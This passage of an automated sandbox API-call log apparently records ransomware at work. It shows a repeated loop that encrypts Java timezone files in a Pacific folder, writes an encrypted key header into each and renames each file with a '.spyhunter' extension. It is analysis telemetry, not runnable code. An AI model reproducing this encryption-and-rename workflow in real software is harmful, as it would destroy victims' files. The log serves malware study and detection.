lpNumberOfBytesWritten=0x57e6cc*=0x4, lpOverlapped=0x0) returned 1 [0167.493] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6cc*=0x30, lpOverlapped=0x0) returned 1 [0167.493] CloseHandle (hObject=0xa0) returned 1 [0167.493] GetProcessHeap () returned 0x2c0000 [0167.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.493] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.spyhunter") returned 66 [0167.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake.spyhunter")) returned 1 [0167.494] GetProcessHeap () returned 0x2c0000 [0167.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.494] GetProcessHeap () returned 0x2c0000 [0167.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.494] GetProcessHeap () returned 0x2c0000 [0167.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4300 | out: hHeap=0x2c0000) returned 1 [0167.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e708 | out: pbBuffer=0x57e708) returned 1 [0167.495] GetProcessHeap () returned 0x2c0000 [0167.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e700*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e700*=0x30) returned 1 [0167.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.496] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu") returned 61 [0167.496] StrStrW (lpFirst="Tongatapu", lpSrch=".txt") returned 0x0 [0167.496] GetProcessHeap () returned 0x2c0000 [0167.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.496] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6c4*=0x85, lpOverlapped=0x0) returned 1 [0167.497] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.497] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6c4*=0x85, lpOverlapped=0x0) returned 1 [0167.498] GetProcessHeap () returned 0x2c0000 [0167.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.498] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.498] WriteFile (in: hFile=0xa0, lpBuffer=0x57e704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x57e704*, lpNumberOfBytesWritten=0x57e6c4*=0x4, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6c4*=0x30, lpOverlapped=0x0) returned 1 [0167.498] CloseHandle (hObject=0xa0) returned 1 [0167.498] GetProcessHeap () returned 0x2c0000 [0167.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.498] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.spyhunter") returned 71 [0167.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu.spyhunter")) returned 1 [0167.500] GetProcessHeap () returned 0x2c0000 [0167.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.500] GetProcessHeap () returned 0x2c0000 [0167.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.500] GetProcessHeap () returned 0x2c0000 [0167.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4f20 | out: hHeap=0x2c0000) returned 1 [0167.500] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e708 | out: pbBuffer=0x57e708) returned 1 [0167.500] GetProcessHeap () returned 0x2c0000 [0167.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.500] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e700*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e700*=0x30) returned 1 [0167.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.501] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa") returned 58 [0167.501] StrStrW (lpFirst="Tarawa", lpSrch=".txt") returned 0x0 [0167.501] GetProcessHeap () returned 0x2c0000 [0167.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.501] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6c4*=0x41, lpOverlapped=0x0) returned 1 [0167.502] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.502] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6c4*=0x41, lpOverlapped=0x0) returned 1 [0167.503] GetProcessHeap () returned 0x2c0000 [0167.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.503] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.503] WriteFile (in: hFile=0xa0, lpBuffer=0x57e704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x57e704*, lpNumberOfBytesWritten=0x57e6c4*=0x4, lpOverlapped=0x0) returned 1 [0167.503] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6c4*=0x30, lpOverlapped=0x0) returned 1 [0167.503] CloseHandle (hObject=0xa0) returned 1 [0167.503] GetProcessHeap () returned 0x2c0000 [0167.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.503] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.spyhunter") returned 68 [0167.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa.spyhunter")) returned 1 [0167.504] GetProcessHeap () returned 0x2c0000 [0167.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.505] GetProcessHeap () returned 0x2c0000 [0167.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.505] GetProcessHeap () returned 0x2c0000 [0167.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4240 | out: hHeap=0x2c0000) returned 1 [0167.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e700 | out: pbBuffer=0x57e700) returned 1 [0167.505] GetProcessHeap () returned 0x2c0000 [0167.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6f8*=0x30) returned 1 [0167.505] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.506] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti") returned 58 [0167.506] StrStrW (lpFirst="Tahiti", lpSrch=".txt") returned 0x0 [0167.506] GetProcessHeap () returned 0x2c0000 [0167.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.506] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6bc*=0x41, lpOverlapped=0x0) returned 1 [0167.507] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.507] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6bc*=0x41, lpOverlapped=0x0) returned 1 [0167.507] GetProcessHeap () returned 0x2c0000 [0167.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.508] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.508] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x57e6fc*, lpNumberOfBytesWritten=0x57e6bc*=0x4, lpOverlapped=0x0) returned 1 [0167.508] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6bc*=0x30, lpOverlapped=0x0) returned 1 [0167.508] CloseHandle (hObject=0xa0) returned 1 [0167.508] GetProcessHeap () returned 0x2c0000 [0167.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.508] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.spyhunter") returned 68 [0167.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti.spyhunter")) returned 1 [0167.510] GetProcessHeap () returned 0x2c0000 [0167.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.510] GetProcessHeap () returned 0x2c0000 [0167.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.510] GetProcessHeap () returned 0x2c0000 [0167.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4180 | out: hHeap=0x2c0000) returned 1 [0167.510] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e700 | out: pbBuffer=0x57e700) returned 1 [0167.510] GetProcessHeap () returned 0x2c0000 [0167.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6f8*=0x30) returned 1 [0167.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.514] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan") returned 58 [0167.514] StrStrW (lpFirst="Saipan", lpSrch=".txt") returned 0x0 [0167.514] GetProcessHeap () returned 0x2c0000 [0167.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.514] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6bc*=0x4d, lpOverlapped=0x0) returned 1 [0167.515] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.515] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6bc*=0x4d, lpOverlapped=0x0) returned 1 [0167.515] GetProcessHeap () returned 0x2c0000 [0167.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.516] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.516] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x57e6fc*, lpNumberOfBytesWritten=0x57e6bc*=0x4, lpOverlapped=0x0) returned 1 [0167.516] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6bc*=0x30, lpOverlapped=0x0) returned 1 [0167.516] CloseHandle (hObject=0xa0) returned 1 [0167.516] GetProcessHeap () returned 0x2c0000 [0167.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.516] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.spyhunter") returned 68 [0167.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan.spyhunter")) returned 1 [0167.517] GetProcessHeap () returned 0x2c0000 [0167.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.517] GetProcessHeap () returned 0x2c0000 [0167.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.517] GetProcessHeap () returned 0x2c0000 [0167.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec40c0 | out: hHeap=0x2c0000) returned 1 [0167.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6f8 | out: pbBuffer=0x57e6f8) returned 1 [0167.517] GetProcessHeap () returned 0x2c0000 [0167.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6f0*=0x30) returned 1 [0167.518] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.518] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga") returned 61 [0167.518] StrStrW (lpFirst="Rarotonga", lpSrch=".txt") returned 0x0 [0167.518] GetProcessHeap () returned 0x2c0000 [0167.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.518] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6b4*=0x11d, lpOverlapped=0x0) returned 1 [0167.519] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffee3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.519] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6b4*=0x11d, lpOverlapped=0x0) returned 1 [0167.519] GetProcessHeap () returned 0x2c0000 [0167.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.519] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.519] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x57e6f4*, lpNumberOfBytesWritten=0x57e6b4*=0x4, lpOverlapped=0x0) returned 1 [0167.520] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6b4*=0x30, lpOverlapped=0x0) returned 1 [0167.520] CloseHandle (hObject=0xa0) returned 1 [0167.520] GetProcessHeap () returned 0x2c0000 [0167.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.520] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.spyhunter") returned 71 [0167.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga.spyhunter")) returned 1 [0167.521] GetProcessHeap () returned 0x2c0000 [0167.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.521] GetProcessHeap () returned 0x2c0000 [0167.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.521] GetProcessHeap () returned 0x2c0000 [0167.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4e58 | out: hHeap=0x2c0000) returned 1 [0167.521] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6f8 | out: pbBuffer=0x57e6f8) returned 1 [0167.521] GetProcessHeap () returned 0x2c0000 [0167.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0167.521] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e6f0*=0x30) returned 1 [0167.521] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.522] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby") returned 64 [0167.522] StrStrW (lpFirst="Port_Moresby", lpSrch=".txt") returned 0x0 [0167.522] GetProcessHeap () returned 0x2c0000 [0167.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.522] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e6b4*=0x1b, lpOverlapped=0x0) returned 1 [0167.523] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.523] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e6b4*=0x1b, lpOverlapped=0x0) returned 1 [0167.523] GetProcessHeap () returned 0x2c0000 [0167.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.523] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.523] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x57e6f4*, lpNumberOfBytesWritten=0x57e6b4*=0x4, lpOverlapped=0x0) returned 1 [0167.523] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6b4*=0x30, lpOverlapped=0x0) returned 1 [0167.524] CloseHandle (hObject=0xa0) returned 1 [0167.524] GetProcessHeap () returned 0x2c0000 [0167.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.524] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.spyhunter") returned 74 [0167.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby.spyhunter")) returned 1 [0167.525] GetProcessHeap () returned 0x2c0000 [0167.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.525] GetProcessHeap () returned 0x2c0000 [0167.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0167.525] GetProcessHeap () returned 0x2c0000 [0167.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05218 | out: hHeap=0x2c0000) returned 1 [0167.525] CryptGenRandom (in: 